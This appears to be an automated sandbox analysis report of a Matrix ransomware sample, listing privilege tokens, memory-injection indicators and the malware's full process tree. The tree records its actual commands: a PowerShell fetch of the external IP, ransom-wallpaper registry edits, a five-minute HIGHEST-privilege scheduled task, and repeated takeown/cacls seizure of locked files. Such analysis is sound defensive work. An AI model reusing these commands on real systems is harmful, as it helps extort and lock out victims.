Token: SeTakeOwnershipPrivilege	7024	takeown.exe
Token: SeTakeOwnershipPrivilege	6100	takeown.exe
Token: SeBackupPrivilege	7400	vssvc.exe
Token: SeRestorePrivilege	7400	vssvc.exe
Token: SeAuditPrivilege	7400	vssvc.exe
Token: SeIncreaseQuotaPrivilege	5320	WMIC.exe
Token: SeSecurityPrivilege	5320	WMIC.exe
Token: SeTakeOwnershipPrivilege	5320	WMIC.exe
Token: SeLoadDriverPrivilege	5320	WMIC.exe
Token: SeSystemProfilePrivilege	5320	WMIC.exe
Token: SeSystemtimePrivilege	5320	WMIC.exe
Token: SeProfSingleProcessPrivilege	5320	WMIC.exe
Token: SeIncBasePriorityPrivilege	5320	WMIC.exe
Token: SeCreatePagefilePrivilege	5320	WMIC.exe
Token: SeBackupPrivilege	5320	WMIC.exe
Token: SeRestorePrivilege	5320	WMIC.exe
Token: SeShutdownPrivilege	5320	WMIC.exe
Token: SeDebugPrivilege	5320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5320	WMIC.exe
Token: SeRemoteShutdownPrivilege	5320	WMIC.exe
Token: SeUndockPrivilege	5320	WMIC.exe
Token: SeManageVolumePrivilege	5320	WMIC.exe
Token: 33	5320	WMIC.exe
Token: 34	5320	WMIC.exe
Token: 35	5320	WMIC.exe
Token: 36	5320	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5320	WMIC.exe
Token: SeSecurityPrivilege	5320	WMIC.exe
Token: SeTakeOwnershipPrivilege	5320	WMIC.exe
Token: SeLoadDriverPrivilege	5320	WMIC.exe
Token: SeSystemProfilePrivilege	5320	WMIC.exe
Token: SeSystemtimePrivilege	5320	WMIC.exe
Token: SeProfSingleProcessPrivilege	5320	WMIC.exe
Token: SeIncBasePriorityPrivilege	5320	WMIC.exe
Token: SeCreatePagefilePrivilege	5320	WMIC.exe
Token: SeBackupPrivilege	5320	WMIC.exe
Token: SeRestorePrivilege	5320	WMIC.exe
Token: SeShutdownPrivilege	5320	WMIC.exe
Token: SeDebugPrivilege	5320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5320	WMIC.exe
Token: SeRemoteShutdownPrivilege	5320	WMIC.exe
Token: SeUndockPrivilege	5320	WMIC.exe
Token: SeManageVolumePrivilege	5320	WMIC.exe
Token: 33	5320	WMIC.exe
Token: 34	5320	WMIC.exe
Token: 35	5320	WMIC.exe
Token: 36	5320	WMIC.exe
Token: SeTakeOwnershipPrivilege	5228	takeown.exe
Token: SeTakeOwnershipPrivilege	2184	takeown.exe
Token: SeTakeOwnershipPrivilege	6848	takeown.exe
Token: SeTakeOwnershipPrivilege	5852	takeown.exe
Token: SeTakeOwnershipPrivilege	6440	takeown.exe
Token: SeTakeOwnershipPrivilege	4036	takeown.exe
Token: SeTakeOwnershipPrivilege	5260	takeown.exe
Token: SeTakeOwnershipPrivilege	7080	takeown.exe
Token: SeTakeOwnershipPrivilege	5808	takeown.exe
Token: SeTakeOwnershipPrivilege	7532	takeown.exe
Token: SeTakeOwnershipPrivilege	8152	takeown.exe
Token: SeTakeOwnershipPrivilege	7308	takeown.exe
Token: SeTakeOwnershipPrivilege	6120	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.execmd.execmd.execmd.execmd.execmd.exeOiMV77U6.execmd.execmd.exe

description	pid	process	target process
PID 3768 wrote to memory of 3916	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 3916	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 3916	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 2112	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	NWwGyCc4.exe
PID 3768 wrote to memory of 2112	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	NWwGyCc4.exe
PID 3768 wrote to memory of 2112	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	NWwGyCc4.exe
PID 3768 wrote to memory of 1952	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 1952	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 1952	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 1952 wrote to memory of 3612	1952	cmd.exe	powershell.exe
PID 1952 wrote to memory of 3612	1952	cmd.exe	powershell.exe
PID 1952 wrote to memory of 3612	1952	cmd.exe	powershell.exe
PID 3768 wrote to memory of 1076	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 1076	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 1076	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 4476	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 4476	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 4476	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 5684	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 5684	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 5684	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 4476 wrote to memory of 5772	4476	cmd.exe	wscript.exe
PID 4476 wrote to memory of 5772	4476	cmd.exe	wscript.exe
PID 4476 wrote to memory of 5772	4476	cmd.exe	wscript.exe
PID 1076 wrote to memory of 5592	1076	cmd.exe	reg.exe
PID 1076 wrote to memory of 5592	1076	cmd.exe	reg.exe
PID 1076 wrote to memory of 5592	1076	cmd.exe	reg.exe
PID 5684 wrote to memory of 5460	5684	cmd.exe	cacls.exe
PID 5684 wrote to memory of 5460	5684	cmd.exe	cacls.exe
PID 5684 wrote to memory of 5460	5684	cmd.exe	cacls.exe
PID 5684 wrote to memory of 5168	5684	cmd.exe	takeown.exe
PID 5684 wrote to memory of 5168	5684	cmd.exe	takeown.exe
PID 5684 wrote to memory of 5168	5684	cmd.exe	takeown.exe
PID 1076 wrote to memory of 5308	1076	cmd.exe	reg.exe
PID 1076 wrote to memory of 5308	1076	cmd.exe	reg.exe
PID 1076 wrote to memory of 5308	1076	cmd.exe	reg.exe
PID 1076 wrote to memory of 5204	1076	cmd.exe	reg.exe
PID 1076 wrote to memory of 5204	1076	cmd.exe	reg.exe
PID 1076 wrote to memory of 5204	1076	cmd.exe	reg.exe
PID 5684 wrote to memory of 5524	5684	cmd.exe	cmd.exe
PID 5684 wrote to memory of 5524	5684	cmd.exe	cmd.exe
PID 5684 wrote to memory of 5524	5684	cmd.exe	cmd.exe
PID 5524 wrote to memory of 6076	5524	cmd.exe	OiMV77U6.exe
PID 5524 wrote to memory of 6076	5524	cmd.exe	OiMV77U6.exe
PID 5524 wrote to memory of 6076	5524	cmd.exe	OiMV77U6.exe
PID 3768 wrote to memory of 6048	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 6048	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 3768 wrote to memory of 6048	3768	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	cmd.exe
PID 6076 wrote to memory of 5360	6076	OiMV77U6.exe	OiMV77U664.exe
PID 6076 wrote to memory of 5360	6076	OiMV77U6.exe	OiMV77U664.exe
PID 6048 wrote to memory of 5944	6048	cmd.exe	cacls.exe
PID 6048 wrote to memory of 5944	6048	cmd.exe	cacls.exe
PID 6048 wrote to memory of 5944	6048	cmd.exe	cacls.exe
PID 6048 wrote to memory of 5476	6048	cmd.exe	cmd.exe
PID 6048 wrote to memory of 5476	6048	cmd.exe	cmd.exe
PID 6048 wrote to memory of 5476	6048	cmd.exe	cmd.exe
PID 6048 wrote to memory of 5980	6048	cmd.exe	cmd.exe
PID 6048 wrote to memory of 5980	6048	cmd.exe	cmd.exe
PID 6048 wrote to memory of 5980	6048	cmd.exe	cmd.exe
PID 5980 wrote to memory of 6084	5980	cmd.exe	OiMV77U6.exe
PID 5980 wrote to memory of 6084	5980	cmd.exe	OiMV77U6.exe
PID 5980 wrote to memory of 6084	5980	cmd.exe	OiMV77U6.exe
PID 6048 wrote to memory of 5836	6048	cmd.exe	OiMV77U6.exe
PID 6048 wrote to memory of 5836	6048	cmd.exe	OiMV77U6.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWwGyCc4.exe"
2⤵
PID:3916

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWwGyCc4.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWwGyCc4.exe" -n
2⤵
- Executes dropped EXE
PID:2112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\RaDjmU1M.txt"
2⤵
- Suspicious use of WriteProcessMemory
PID:1952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\nCCQyqoj.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1076

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\nCCQyqoj.bmp" /f
3⤵
- Sets desktop wallpaper using registry
PID:5592

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
3⤵
PID:5308

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
3⤵
PID:5204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\hPXenl83.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:4476

C:\Windows\SysWOW64\wscript.exe
wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\hPXenl83.vbs"
3⤵
- Checks computer location settings
PID:5772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\f5sS4CPO.bat" /sc minute /mo 5 /RL HIGHEST /F
4⤵
PID:6376

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\f5sS4CPO.bat" /sc minute /mo 5 /RL HIGHEST /F
5⤵
- Creates scheduled task(s)
PID:6028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
4⤵
PID:6540

C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /I /tn DSHCA
5⤵
PID:7280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
2⤵
- Suspicious use of WriteProcessMemory
PID:5684

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
3⤵
PID:5460

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "store.db" -nobanner
3⤵
- Suspicious use of WriteProcessMemory
PID:5524

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "store.db" -nobanner
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:6076

C:\Users\Admin\AppData\Local\Temp\OiMV77U664.exe
OiMV77U6.exe -accepteula "store.db" -nobanner
5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:5360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""
2⤵
- Suspicious use of WriteProcessMemory
PID:6048

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C
3⤵
PID:5944

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"
3⤵
- Modifies file permissions
PID:5476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "ActivitiesCache.db" -nobanner
3⤵
- Suspicious use of WriteProcessMemory
PID:5980

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "ActivitiesCache.db" -nobanner
4⤵
- Executes dropped EXE
PID:6084

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:5836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db""
2⤵
PID:6044

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db" /E /G Admin:F /C
3⤵
PID:5944

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db"
3⤵
PID:2728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "EdgeEDropSQLite.db" -nobanner
3⤵
PID:5188

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "EdgeEDropSQLite.db" -nobanner
4⤵
- Executes dropped EXE
PID:6108

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:5828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db""
2⤵
PID:6072

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db" /E /G Admin:F /C
3⤵
PID:5784

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db"
3⤵
- Modifies file permissions
PID:5340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "heavy_ad_intervention_opt_out.db" -nobanner
3⤵
PID:5968

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "heavy_ad_intervention_opt_out.db" -nobanner
4⤵
- Executes dropped EXE
PID:6016

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:5972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db""
2⤵
PID:5880

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db" /E /G Admin:F /C
3⤵
PID:6088

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db"
3⤵
- Modifies file permissions
PID:5472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "load_statistics.db" -nobanner
3⤵
PID:1076

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "load_statistics.db" -nobanner
4⤵
- Executes dropped EXE
PID:6908

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:6948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db""
2⤵
PID:6968

C:\Windows\SysWOW64\cacls.exe
cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C
3⤵
PID:7012

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "qmgr.db" -nobanner
3⤵
PID:7040

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "qmgr.db" -nobanner
4⤵
- Executes dropped EXE
PID:7052

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:7084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\first_party_sets.db""
2⤵
PID:7132

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\first_party_sets.db" /E /G Admin:F /C
3⤵
PID:6024

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\first_party_sets.db"
3⤵
PID:5148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "first_party_sets.db" -nobanner
3⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "first_party_sets.db" -nobanner
4⤵
- Executes dropped EXE
PID:5732

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:5208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
2⤵
PID:6096

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
3⤵
PID:5040

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
3⤵
- Modifies file permissions
PID:6160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "store.db" -nobanner
3⤵
PID:6172

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "store.db" -nobanner
4⤵
- Executes dropped EXE
PID:6196

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:6264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\All Users\Microsoft\Diagnosis\EventStore.db""
2⤵
PID:6760

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\All Users\Microsoft\Diagnosis\EventStore.db" /E /G Admin:F /C
3⤵
PID:5332

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\All Users\Microsoft\Diagnosis\EventStore.db"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "EventStore.db" -nobanner
3⤵
PID:6164

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "EventStore.db" -nobanner
4⤵
- Executes dropped EXE
PID:2188

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:5816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db""
2⤵
PID:6256

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db" /E /G Admin:F /C
3⤵
PID:6316

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db"
3⤵
PID:6340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "EdgeHubAppUsageSQLite.db" -nobanner
3⤵
PID:6424

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "EdgeHubAppUsageSQLite.db" -nobanner
4⤵
- Executes dropped EXE
PID:4740

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:6464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""
2⤵
PID:7124

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C
3⤵
PID:5144

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"
3⤵
PID:5868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "classes.jsa" -nobanner
3⤵
PID:7104

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "classes.jsa" -nobanner
4⤵
- Executes dropped EXE
PID:6956

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:5572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""
2⤵
PID:5780

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C
3⤵
PID:6964

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"
3⤵
PID:5548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "classes.jsa" -nobanner
3⤵
PID:5476

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "classes.jsa" -nobanner
4⤵
- Executes dropped EXE
PID:5832

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:7352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\msedge_200_percent.pak""
2⤵
PID:4860

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\msedge_200_percent.pak" /E /G Admin:F /C
3⤵
PID:7600

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\msedge_200_percent.pak"
3⤵
- Modifies file permissions
PID:6012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "msedge_200_percent.pak" -nobanner
3⤵
PID:5340

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "msedge_200_percent.pak" -nobanner
4⤵
- Executes dropped EXE
PID:6760

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:5740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\as.pak""
2⤵
PID:4080

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\as.pak" /E /G Admin:F /C
3⤵
PID:3792

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\as.pak"
3⤵
- Modifies file permissions
PID:5960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "as.pak" -nobanner
3⤵
PID:7024

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "as.pak" -nobanner
4⤵
- Executes dropped EXE
PID:7052

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:4768

C:\Windows\SysWOW64\cmd.exe
